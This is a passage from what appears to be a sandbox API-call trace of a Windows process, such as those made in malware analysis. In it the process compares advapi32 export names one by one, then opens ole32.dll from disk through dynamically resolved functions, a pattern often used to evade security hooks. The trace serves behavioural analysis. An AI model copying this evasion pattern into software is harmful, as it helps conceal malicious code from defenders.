lpString2="A_SHAUpdate") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0222.350] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0222.350] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0222.350] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0222.351] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0222.352] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0222.353] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.354] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0222.355] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0222.355] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0222.356] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0222.357] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0222.357] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0222.357] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0222.684] GetProcessHeap () returned 0x480000 [0222.684] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d42010 | out: hHeap=0x480000) returned 1 [0222.691] GetProcessHeap () returned 0x480000 [0222.691] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x4998e0 [0222.692] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0222.692] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0222.692] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0222.692] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0222.692] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0222.693] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0222.693] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0222.693] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0222.693] GetProcessHeap () returned 0x480000 [0222.693] RtlAllocateHeap 